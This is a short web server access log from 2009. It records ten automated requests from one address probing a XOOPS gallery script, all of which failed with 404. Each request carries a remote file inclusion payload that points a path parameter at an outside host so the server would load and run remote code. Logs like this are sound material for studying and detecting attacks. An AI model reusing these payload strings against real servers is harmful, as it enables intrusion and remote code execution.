190.144.44.36 - - [12/Sep/2009:00:43:24 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:33 -0400] "GET /logs/access_log.Q109081000%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:41 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:41 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:41 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:41 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:41 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:46 -0400] "GET /logs/access_log.Q109081000%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:50 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:53 -0400] "GET /logs/access_log.Q109081000%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
